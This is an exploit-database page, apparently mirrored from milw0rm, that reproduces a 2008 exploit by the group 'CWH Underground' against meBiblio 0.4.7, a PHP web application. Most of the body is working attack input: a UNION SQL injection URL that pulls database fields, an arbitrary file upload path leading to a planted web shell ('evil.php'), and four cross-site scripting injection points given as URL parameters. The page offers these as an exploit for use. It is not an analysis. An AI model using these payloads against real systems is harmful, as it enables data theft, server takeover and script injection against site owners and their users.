[] NeoSense
E X P L O I T S
title author type platform port cve id

mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting

Author: CWH Underground
type: webapps
platform: php
port: 
date_added: 2008-05-31 
date_updated: 2016-12-07 
verified: 1 
codes: OSVDB-46320;CVE-2008-2648;OSVDB-46122;OSVDB-45915;OSVDB-45914;OSVDB-45913;CVE-2008-2647;OSVDB-45912;CVE-2008-2646 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commeBiblio-0.4.7.tar.gz
========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Lastest Version)
 VENDOR      : http://mebiblio.sourceforge.net/
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will found PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must existed]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:

http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.